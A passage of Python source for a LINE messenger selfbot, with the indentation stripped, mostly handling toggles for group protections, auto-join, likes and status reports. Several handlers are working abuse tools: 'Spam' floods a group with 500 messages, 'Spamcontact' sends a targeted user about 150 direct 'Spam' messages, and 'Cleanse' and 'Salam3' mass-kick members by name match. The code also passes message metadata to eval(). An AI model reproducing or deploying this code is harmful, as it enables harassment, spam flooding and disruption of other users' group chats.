kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
#======================== FOR COMMAND MODE OFF STARTING ==========================#
elif msg.text.lower() == 'mode off':
if wait["protect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection already Off")
else:
kr.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already off")
else:
kr.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already Off")
else:
kr.sendText(msg.to,"Protection Qr already Off")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
#========================== FOR COMMAND BOT STARTING =============================#
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
wait["contact"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ")
else:
kr.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protecion Already On")
else:
kr.sendText(msg.to,"Protecion Already On")
elif msg.text.lower() == 'qr on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already On")
else:
kr.sendText(msg.to,"Protection Qr already On")
elif msg.text.lower() == 'invite on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already On")
else:
kr.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
elif msg.text.lower() == 'cancel on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи")
elif msg.text.lower() == 'autojoin off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff")
else:
kr.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff")
elif msg.text.lower() == 'protect off':
if wait["protect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection already Off")
else:
kr.sendText(msg.to,"Protection already Off")
else:
wait["protect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff")
else:
kr.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff")
elif msg.text.lower() == 'qr off':
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already off")
else:
kr.sendText(msg.to,"Protection Qr already off")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Qr already Off")
else:
kr.sendText(msg.to,"Protection Qr already Off")
elif msg.text.lower() == 'invit off':
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Invite already Off")
else:
kr.sendText(msg.to,"Protection Invite already Off")
elif msg.text.lower() == 'cancel off':
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Protection Cancel already Off")
else:
kr.sendText(msg.to,"Protection Cancel already Off")
elif "Grup cancel:" in msg.text:
try:
strnum = msg.text.replace("Grup cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Itu off undangan ditolak??\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan")
else:
kr.sendText(msg.to,"Off undangan ditolak??Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis")
else:
kr.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Nilai tidak benar")
else:
kr.sendText(msg.to,"Weird value")
elif msg.text.lower() == 'autoleave on':
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to on")
else:
kr.sendText(msg.to,"Auto Leave room already on")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to on")
else:
kr.sendText(msg.to,"Auto Leave room already on")
elif msg.text.lower() == 'autoleave off':
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to off")
else:
kr.sendText(msg.to,"Auto Leave room already off")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto Leave room set to off")
else:
kr.sendText(msg.to,"Auto Leave room already off")
elif msg.text.lower() == 'share on':
if wait["timeline"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to on")
else:
kr.sendText(msg.to,"Share already on")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to on")
else:
kr.sendText(msg.to,"Share already on")
elif msg.text.lower() == 'share off':
if wait["timeline"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to off")
else:
kr.sendText(msg.to,"Share already off")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Share set to off")
else:
kr.sendText(msg.to,"Share already off")
elif msg.text.lower() == 'status':
md = """╔═════════════\n"""
if wait["contact"] == True: md+="Contact:on [✅]\n"
else: md+="Contact:off [❌]\n"
if wait["autoJoin"] == True: md+="Auto Join:on [✅]\n"
else: md +="Auto Join:off [❌]\n"
if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "[✅]\n"
else: md+= "Group cancel:off [❌]\n"
if wait["leaveRoom"] == True: md+="Auto leave:on [✅]\n"
else: md+="Auto leave:off [❌]\n"
if wait["timeline"] == True: md+="Share:on [✅]\n"
else:md+="Share:off [❌]\n"
if wait["autoAdd"] == True: md+="Auto add:on [✅]\n"
else:md+="Auto add:off [❌]\n"
if wait["protect"] == True: md+="Protect:on [✅]\n"
else:md+="Protect:off [❌]\n"
if wait["linkprotect"] == True: md+="Link Protect:on [✅]\n"
else:md+="Link Protect:off [❌]\n"
if wait["inviteprotect"] == True: md+="Invitation Protect:on [✅]\n"
else:md+="Invitation Protect:off [❌]\n"
if wait["cancelprotect"] == True: md+="Cancel Protect:on [✅]\n"
else:md+="Cancel Protect:off [❌]\n╚═════════════"
kr.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
elif cms(msg.text,["creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
kr.sendMessage(msg)
kr.sendText(msg.to,'Creator yang manis ganteng dan kalem ')
elif msg.text.lower() == 'autoadd on':
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to on")
else:
kr.sendText(msg.to,"Auto add already on")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to on")
else:
kr.sendText(msg.to,"Auto add already on")
elif msg.text.lower() == 'autoadd off':
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to off")
else:
kr.sendText(msg.to,"Auto add already off")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Auto add set to off")
else:
kr.sendText(msg.to,"Auto add already off")
elif "Pesan set:" in msg.text:
wait["message"] = msg.text.replace("Pesan set:","")
kr.sendText(msg.to,"We changed the message")
elif msg.text.lower() == 'pesan cek':
if wait["lang"] == "JP":
kr.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
else:
kr.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif "Come Set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
kr.sendText(msg.to,"Merupakan string yang tidak bisa diubah")
else:
wait["comment"] = c
kr.sendText(msg.to,"Ini telah diubah\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Aku berada di")
else:
kr.sendText(msg.to,"To open")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Comment Actived")
else:
kr.sendText(msg.to,"Comment Has Been Active")
elif msg.text in ["Come off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Hal ini sudah off")
else:
kr.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Off")
else:
kr.sendText(msg.to,"To turn off")
elif msg.text in ["Com","Comment"]:
kr.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
kr.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
kr.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
kr.sendText(msg.to,"Nothing in the blacklist")
else:
kr.sendText(msg.to,"The following is a blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +kr.getContact(mi_d).displayName + "\n"
kr.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
kr.sendText(msg.to,"Jam already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr.getProfile()
profile.displayName = wait["cName"] + nowT
kr.updateProfile(profile)
kr.sendText(msg.to,"Jam set on")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
kr.sendText(msg.to,"Jam already off")
else:
wait["clock"] = False
kr.sendText(msg.to,"Jam set off")
elif "Jam say:" in msg.text:
n = msg.text.replace("Jam say:","")
if len(n.decode("utf-8")) > 30:
kr.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
kr.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr.getProfile()
profile.displayName = wait["cName"] + nowT
kr.updateProfile(profile)
kr.sendText(msg.to,"Diperbarui")
else:
kr.sendText(msg.to,"Silahkan Aktifkan Jam")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
kr.sendImageWithURL(msg.to,path)
except:
pass
#========================== FOR COMMAND BOT FINISHED =============================#
elif "Spam change:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam change:","")
kr.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.toType == 2:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
kr.sendText(msg.to,"spam changed")
else:
kr.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
kr.sendText(msg.to, wait["spam"])
#=====================================
elif "Spam " in msg.text:
if msg.toType == 2:
bctxt = msg.text.replace("Spam ", "")
t = kr.getAllContactIds()
t = 500
while(t):
kr.sendText(msg.to, (bctxt))
t-=1
#==============================================
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = kr.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(g.mid,"Spam")
kr.sendText(msg.to, "Done")
print " Spammed !"
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
kr.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
kr.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
kr.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"Already")
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
kr.sendText(msg.to,"Simi mode On")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
kr.sendText(msg.to,"Simi mode Off")
elif msg.text in ["Autoread on","Read:on"]:
wait['alwayRead'] = True
kr.sendText(msg.to,"Auto read On")
elif msg.text in ["Autoread off","Read:off"]:
wait['alwayRead'] = False
kr.sendText(msg.to,"Auto read Off")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
kr.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
kr.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
kr.sendText(msg.to,"Auto Kick tag ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
kr.sendText(msg.to,"Auto Kick tag OFF")
elif "Time" in msg.text:
if msg.toType == 2:
kr.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==============================================================================#
elif msg.text in ["Datang on","datang on"]:
if wait["Wc"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"already on")
elif msg.text in ["Datang off","datang off"]:
if wait["Wc"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"already oғғ")
#==============================================================================#
elif msg.text in ["Pamit on","pamit on"]:
if wait["Lv"] == True:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
kr.sendText(msg.to,"already on")
elif msg.text in ["Pamit off","pamit off"]:
if wait["Lv"] == False:
if wait["lang"] == "JP":
kr.sendText(msg.to,"noтιғ yg leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
kr.sendText(msg.to,"already oғғ")
#==============================================================================#
elif "Cleanse" in msg.text:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Cleanse","")
gs = kr.getGroup(msg.to)
gs = kr.getGroup(msg.to)
gs = kr.getGroup(msg.to)
kr.sendText(msg.to,"Just some casual cleansing ô")
kr.sendText(msg.to,"Group cleansed.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Not found.")
kr.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[kr,kr,kr]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr.sendText(msg.to,"Group cleanse")
kr.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in admin:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"Assalamu'alaikum")
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = kr.getGroup(msg.to)
kr.sendText(msg.to,"maaf kalo gak sopan")
kr.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
kr.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in admin:
try:
klist=[kr]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr.sendText(msg.to,"Nah salamnya jawab sendiri dah")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr.kickoutFromGroup(msg.to,[target])
except:
kr.sendText(msg.to,"Error")
elif ("Cipok " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr.kickoutFromGroup(msg.to,[target])
kr.inviteIntoGroup(msg.to,[target])
kr.cancelGroupInvitation(msg.to,[target])
except:
kr.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
kr.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
kr.findAndAddContactsByMid(key)
kr.inviteIntoGroup(msg.to, [key])
contact = kr.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = kr.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
kr.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Tidak ada undangan")
else:
kr.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"Tidak ada undangan")
else:
kr.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = kr.getGroup(msg.to)
group.preventJoinByTicket = False
kr.updateGroup(group)
if wait["lang"] == "JP":
kr.sendText(msg.to,"URL open")
else:
kr.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"It can not be used outside the group")
else:
kr.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = kr.getGroup(msg.to)
group.preventJoinByTicket = True
kr.updateGroup(group)
if wait["lang"] == "JP":
kr.sendText(msg.to,"URL close")
else:
kr.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
kr.sendText(msg.to,"It can not be used outside the group")
else:
kr.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = kr.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
kr.updateGroup(g)
gurl = kr.reissueGroupTicket(msg.to)
kr.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = kr.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
kr.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
